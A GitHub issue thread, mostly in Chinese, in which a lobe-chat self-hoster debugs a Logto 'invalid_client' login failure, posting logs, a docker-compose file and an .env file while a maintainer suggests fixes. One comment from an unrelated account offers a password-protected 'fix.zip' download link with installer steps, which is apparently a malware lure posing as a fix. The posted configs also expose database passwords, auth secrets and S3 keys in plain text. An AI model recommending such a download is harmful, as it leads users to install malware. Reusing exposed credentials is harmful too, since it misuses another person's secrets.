### ISSUE TITLE
[Bug] 你好我使用localhost版本的docker-compose部署，点击logto登录时网页报错，麻烦帮忙看下为什么

### ISSUE THREAD

**Issue by zhangleijun111** [lobehub/lobe-chat#3664]
### 📦 部署环境

Other

### 📌 软件版本

7.9

### 💻 系统环境

Other

### 🌐 浏览器

Chrome

### 🐛 问题描述

报错信息\u2705 database migration pass.
-------------------------------------
  \u25b2 Next.js 14.2.7
  - Local:        http://localhost:3210
  - Network:      http://0.0.0.0:3210

 \u2713 Starting...
 \u2713 Ready in 254ms
challenge {
  scheme: 'basic',
  parameters: {
    realm: 'http://localhost:3001/oidc',
    error: 'invalid_client',
    error_description: 'client authentication failed'
  }
}
[auth][error] CallbackRouteError: Read more at https://errors.authjs.dev#callbackrouteerror
[auth][cause]: Error: TODO: Handle www-authenticate challenges as needed
    at n0 (/app/.next/server/chunks/28529.js:362:27935)
    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
    at async ir (/app/.next/server/chunks/28529.js:362:34036)
    at async ip (/app/.next/server/chunks/28529.js:362:45365)
    at async im (/app/.next/server/chunks/28529.js:362:49738)
    at async /app/node_modules/.pnpm/next@14.2.7_@babel+core@7.23.6_supports-color@8.1.1__@opentelemetry+api@1.9.0_react-dom@18.3._dnmyh4q5vccmzwzgeuqoes2zd4/node_modules/next/dist/compiled/next-server/app-route.runtime.prod.js:6:36258
    at async eR.execute (/app/node_modules/.pnpm/next@14.2.7_@babel+core@7.23.6_supports-color@8.1.1__@opentelemetry+api@1.9.0_react-dom@18.3._dnmyh4q5vccmzwzgeuqoes2zd4/node_modules/next/dist/compiled/next-server/app-route.runtime.prod.js:6:26874)
    at async eR.handle (/app/node_modules/.pnpm/next@14.2.7_@babel+core@7.23.6_supports-color@8.1.1__@opentelemetry+api@1.9.0_react-dom@18.3._dnmyh4q5vccmzwzgeuqoes2zd4/node_modules/next/dist/compiled/next-server/app-route.runtime.prod.js:6:37512)
    at async doRender (/app/node_modules/.pnpm/next@14.2.7_@babel+core@7.23.6_supports-color@8.1.1__@opentelemetry+api@1.9.0_react-dom@18.3._dnmyh4q5vccmzwzgeuqoes2zd4/node_modules/next/dist/server/base-server.js:1357:42)
    at async cacheEntry.responseCache.get.routeKind (/app/node_modules/.pnpm/next@14.2.7_@babel+core@7.23.6_supports-color@8.1.1__@opentelemetry+api@1.9.0_react-dom@18.3._dnmyh4q5vccmz

### 📷 复现步骤

截图
![b403162a22ab8890a2eb61c3dc2399e](https://github.com/user-attachments/assets/7a1ee666-23a1-45d6-9bf9-bb0c17a183b2)
![2896ea87707b55cbfe725244741d4ad](https://github.com/user-attachments/assets/f8b60681-785f-4040-833e-968ddf23a7aa)

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zhuozhiyongde** [comment]
不要尝试动端口，以及你可以贴一些控制台和 docker 报错

**Comment by zhangleijun111** [comment]
> 不要尝试动端口，以及你可以贴一些控制台和 docker 报错

你好我没有移动端口，我就是正常配置，你看看我的配置文件
docker-composeservices:
  postgresql:
    image: registry.us-west-1.aliyuncs.com/jg-images/pgvector:pg16
    container_name: lobe-postgres
    network_mode: 'host'
    volumes:
      - './data:/var/lib/postgresql/data'
    environment:
      - 'POSTGRES_DB=lobe'
      - 'POSTGRES_PASSWORD=uWNZugjBqixf8dxC'
    healthcheck:
      test: ['CMD-SHELL', 'pg_isready -U postgres']
      interval: 5s
      timeout: 5s
      retries: 5
    restart: always

  minio:
    image: registry.us-west-1.aliyuncs.com/jg-images/minio:latest
    container_name: lobe-minio
    network_mode: 'host'
    volumes:
      - './s3_data:/etc/minio/data'
    environment:
      - 'MINIO_ROOT_USER=minioadmin'
      - 'MINIO_ROOT_PASSWORD=minioadmin'
      - 'MINIO_DOMAIN=localhost:9000'
      - 'MINIO_API_CORS_ALLOW_ORIGIN=http://localhost:3210'
    restart: always
    command: >
      server /etc/minio/data --address ":9000" --console-address ":9001"


  logto:
    image: registry.us-west-1.aliyuncs.com/jg-images/logto:latest
    container_name: lobe-logto
    network_mode: 'host'
    depends_on:
      postgresql:
        condition: service_healthy
    environment:
      - 'TRUST_PROXY_HEADER=1'
      - 'DB_URL=postgresql://postgres:uWNZugjBqixf8dxC@localhost:5432/logto'
      - 'ENDPOINT=http://localhost:3001'
      - 'ADMIN_ENDPOINT=http://localhost:3002'
    entrypoint: ['sh', '-c', 'npm run cli db seed -- --swe && npm start']

  lobe:
    image: registry.us-west-1.aliyuncs.com/jg-images/lobe-chat-database
    container_name: lobe-database
    network_mode: 'host'
    depends_on:
      - postgresql
      - minio
      - logto
    env_file:
      - .env
    restart: always

volumes:
  data:
    driver: local
  s3_data:
    driver: local


env
# LobeChat 域名
APP_URL=https://localhost:3210

# Postgres 相关，也即 DB 必须的环境变量
# 用于加密敏感信息的密钥，可以使用 openssl rand -base64 32 生成
KEY_VAULTS_SECRET=Kix2wcUONd4CX51E/ZPAd36BqM4wzJgKjPtz2sGztqQ=
# Postgres 数据库连接字符串
# 格式：postgres://username:password@host:port/dbname，如果你的 pg 实例与 LobeChat 服务在同一 Docker 网络中，可以使用容器名作为 host
DATABASE_URL=postgresql://postgres:uWNZugjBqixf8dxC@localhost:5432/postgres

# NEXT_AUTH 相关，可以使用 auth0、Azure AD、GitHub、Authentik、Zitadel、Logto 等，如有其他接入诉求欢迎提 PR
# 这里以 Logto 为例
NEXT_AUTH_SECRET=NX2kaPE923dt6BL2U8e9oSre5RfoT7hg
NEXT_AUTH_SSO_PROVIDERS=logto
NEXTAUTH_URL=http://localhost:3210/api/auth
LOGTO_CLIENT_ID=7azullhx1pvqqmokpe1g9
LOGTO_CLIENT_SECRET=qkGcf1QHHmiCXb40FhMaxcJHUOUlt4F1
LOGTO_ISSUER=http://localhost:3001/oidc
# 注：如果你有 ACCESS_CODE，请务必清空，我们以 NEXT_AUTH 作为唯一鉴权来源
# Proxy，如果你需要的话（比如你使用 GitHub 作为鉴权服务提供商）
# HTTP_PROXY=http://localhost:7890
# HTTPS_PROXY=http://localhost:7890

# MinIO S3 配置
S3_ACCESS_KEY_ID=QzMdPlJL2Zqx8DoNt8iB # 直到在 MinIO UI 中手动创建之前都是无效的
S3_SECRET_ACCESS_KEY=XDZlx0G7dty7eesZSiOZtY6jJRhzFMsQttIvV1Hh # 直到在 MinIO UI 中手动创建之前都是无效的
S3_ENDPOINT=http://localhost:9000
S3_BUCKET=lobe # 直到在 MinIO UI 中手动创建之前都是无效的
S3_PUBLIC_DOMAIN=http://localhost:9000
S3_ENABLE_PATH_STYLE=1

logto的截图
![Uploading c3bb4b70fbd81afc0205c697457bba5.png…]()

**Comment by zhangleijun111** [comment]
> 图片没传上来，以及你贴代码能不能用代码块包一下...
> 
> docker容器的日志呢？

你好这是容器的日志


\u2705 database migration pass.
-------------------------------------
  \u25b2 Next.js 14.2.7
  - Local:        http://localhost:3210
  - Network:      http://0.0.0.0:3210

 \u2713 Starting...
 \u2713 Ready in 254ms
challenge {
  scheme: 'basic',
  parameters: {
    realm: 'http://localhost:3001/oidc',
    error: 'invalid_client',
    error_description: 'client authentication failed'
  }
}
[auth][error] CallbackRouteError: Read more at https://errors.authjs.dev#callbackrouteerror
[auth][cause]: Error: TODO: Handle www-authenticate challenges as needed
    at n0 (/app/.next/server/chunks/28529.js:362:27935)
    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
    at async ir (/app/.next/server/chunks/28529.js:362:34036)
    at async ip (/app/.next/server/chunks/28529.js:362:45365)
    at async im (/app/.next/server/chunks/28529.js:362:49738)
    at async /app/node_modules/.pnpm/next@14.2.7_@babel+core@7.23.6_supports-color@8.1.1__@opentelemetry+api@1.9.0_react-dom@18.3._dnmyh4q5vccmzwzgeuqoes2zd4/node_modules/next/dist/compiled/next-server/app-route.runtime.prod.js:6:36258
    at async eR.execute (/app/node_modules/.pnpm/next@14.2.7_@babel+core@7.23.6_supports-color@8.1.1__@opentelemetry+api@1.9.0_react-dom@18.3._dnmyh4q5vccmzwzgeuqoes2zd4/node_modules/next/dist/compiled/next-server/app-route.runtime.prod.js:6:26874)
    at async eR.handle (/app/node_modules/.pnpm/next@14.2.7_@babel+core@7.23.6_supports-color@8.1.1__@opentelemetry+api@1.9.0_react-dom@18.3._dnmyh4q5vccmzwzgeuqoes2zd4/node_modules/next/dist/compiled/next-server/app-route.runtime.prod.js:6:37512)
    at async doRender (/app/node_modules/.pnpm/next@14.2.7_@babel+core@7.23.6_supports-color@8.1.1__@opentelemetry+api@1.9.0_react-dom@18.3._dnmyh4q5vccmzwzgeuqoes2zd4/node_modules/next/dist/server/base-server.js:1357:42)
    at async cacheEntry.responseCache.get.routeKind (/app/node_modules/.pnpm/next@14.2.7_@babel+core@7.23.6_supports-color@8.1.1__@opentelemetry+api@1.9.0_react-dom@18.3._dnmyh4q5vccmzwzgeuqoes2zd4/node_modules/next/dist/server/base-server.js:1579:28)
[auth][details]: {
  "provider": "logto"
}
[NextAuth] Error: {
  cause: 'Configuration',
  message: 'Wrong configuration, make sure you have the correct environment variables set. Visit https://lobehub.com/docs/self-hosting/advanced/authentication for more details.',
  name: 'NextAuth Error'
}
challenge {
  scheme: 'basic',
  parameters: {
[auth][error] CallbackRouteError: Read more at https://errors.authjs.dev#callbackrouteerror
    realm: 'http://localhost:3001/oidc',
    error: 'invalid_client',
    error_description: 'client authentication failed'
  }
}
[auth][cause]: Error: TODO: Handle www-authenticate challenges as needed
    at n0 (/app/.next/server/chunks/28529.js:362:27935)
    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
    at async ir (/app/.next/server/chunks/28529.js:362:34036)
    at async ip (/app/.next/server/chunks/28529.js:362:45365)
    at async im (/app/.next/server/chunks/28529.js:362:49738)
    at async /app/node_modules/.pnpm/next@14.2.7_@babel+core@7.23.6_supports-color@8.1.1__@opentelemetry+api@1.9.0_react-dom@18.3._dnmyh4q5vccmzwzgeuqoes2zd4/node_modules/next/dist/compiled/next-server/app-route.runtime.prod.js:6:36258
    at async eR.execute (/app/node_modules/.pnpm/next@14.2.7_@babel+core@7.23.6_supports-color@8.1.1__@opentelemetry+api@1.9.0_react-dom@18.3._dnmyh4q5vccmzwzgeuqoes2zd4/node_modules/next/dist/compiled/next-server/app-route.runtime.prod.js:6:26874)
    at async eR.handle (/app/node_modules/.pnpm/next@14.2.7_@babel+core@7.23.6_supports-color@8.1.1__@opentelemetry+api@1.9.0_react-dom@18.3._dnmyh4q5vccmzwzgeuqoes2zd4/node_modules/next/dist/compiled/next-server/app-route.runtime.prod.js:6:37512)
    at async doRender (/app/node_modules/.pnpm/next@14.2.7_@babel+core@7.23.6_supports-color@8.1.1__@opentelemetry+api@1.9.0_react-dom@18.3._dnmyh4q5vccmzwzgeuqoes2zd4/node_modules/next/dist/server/base-server.js:1357:42)
    at async cacheEntry.responseCache.get.routeKind (/app/node_modules/.pnpm/next@14.2.7_@babel+core@7.23.6_supports-color@8.1.1__@opentelemetry+api@1.9.0_react-dom@18.3._dnmyh4q5vccmzwzgeuqoes2zd4/node_modules/next/dist/server/base-server.js:1579:28)
[auth][details]: {
  "provider": "logto"
}
[NextAuth] Error: {
  cause: 'Configuration',
  message: 'Wrong configuration, make sure you have the correct environment variables set. Visit https://lobehub.com/docs/self-hosting/advanced/authentication for more details.',
  name: 'NextAuth Error'
}

**Comment by zhangleijun111** [comment]
> 
> docker容器的日志呢？

图片：


> 图片没传上来，以及你贴代码能不能用代码块包一下...
> 
> docker容器的日志呢？

![b403162a22ab8890a2eb61c3dc2399e](https://github.com/user-attachments/assets/514e0f02-03ee-4e52-bff1-4abdb2e8b246)
![2896ea87707b55cbfe725244741d4ad](https://github.com/user-attachments/assets/42476931-b014-4f9e-9651-5f4a5e16bce9)
![c3bb4b70fbd81afc0205c697457bba5](https://github.com/user-attachments/assets/e923c740-9ab5-489c-a79d-ff906c00d78f)

**Comment by zhuozhiyongde** [comment]
都说了用代码块包裹一下，你也不自己看看直接贴是个什么阅读体验...

你这个我确实没看出来任何问题，建议排查 Logto 的两个参数是否正确填写到了 .env 文件，别的我也暂时没有思路。

**Comment by zhangleijun111** [comment]
我的env检查几遍了



发自我的iPhone


------------------ 原始邮件 ------------------
发件人: Arthals ***@***.***&gt;
发送时间: 2024年8月29日 13:54
收件人: lobehub/lobe-chat ***@***.***&gt;
抄送: zhangleijun111 ***@***.***&gt;, Mention ***@***.***&gt;
主题: Re: [lobehub/lobe-chat] [Bug] 你好我使用localhost版本的docker-compose部署，点击logto登录时网页报错，麻烦帮忙看下为什么 (Issue #3664)





 
都说了用代码块包裹一下，你也不自己看看直接贴是个什么阅读体验...
 
你这个我确实没看出来任何问题，建议排查 Logto 的两个参数是否正确填写到了 .env 文件，别的我也暂时没有思路。

**Comment by zhuozhiyongde** [comment]
https://github.com/lobehub/lobe-chat/blob/50373aac29998f7ca7f37b306687b12f5b763cbc/docker-compose/local/docker-compose.yml

https://github.com/lobehub/lobe-chat/blob/50373aac29998f7ca7f37b306687b12f5b763cbc/docker-compose/local/.env.zh-CN.example

换用这两个配置文件试试。
